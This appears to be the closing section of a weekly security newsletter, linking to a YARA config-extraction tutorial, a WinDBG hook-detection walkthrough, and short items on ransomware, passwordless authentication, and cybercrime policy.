Abdallah Elshinbary shows how complex YARA rules can be written to extract the configuration of implants.
https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/
Finding hooks with WinDBG
Oliver Bachtik provides a nice walkthrough of techniques useful to offensive and defensive researchers on Windows alike.
I’ve developed the methods discussed here by myself and they have proven to be useful for me. I was assigned to evaluate the security and the inner workings of a specific application control solution. I needed a practical and easy solution, without too much coding, preferably using windbg. For that I wanted to be able to:
Detect the DLL which performs hooking
Detect all the hooks that it sets up
Restore all the previous instructions (before the hook)
https://blog.nviso.eu/2022/08/05/finding-hooks-with-windbg/
Footnotes
Some other small bits and bobs which might be of interest.
Industrial Ransomware Analysis: Q2 2022 - sounds really scary - 43 ransomware groups target industrial organizations and infrastructures - I doubt 43 groups target, as opposed to having touched, but happy to be schooled.
Ransomware Task Force Releases Blueprint for Ransomware Defense
Old MacDonald had a smart farm: Building a testbed to study cybersecurity in smart dairy farming
How Passwordless Works - explains how passwordless can be implemented using modern technologies such as Web Authentication (WebAuthn), while at the same time providing better user experience and security than the traditional password-based
Dos and Don'ts of Machine Learning in Computer Security - New paper presented at USENIX.
UN Cybercrime Negotiation Insights - a podcast featuring a big tech company and a human rights organisation.
Organized crime and instability: Mapping illicit hubs in West Africa (including cyber) - event happening in September.
That’s all folks.. until next week..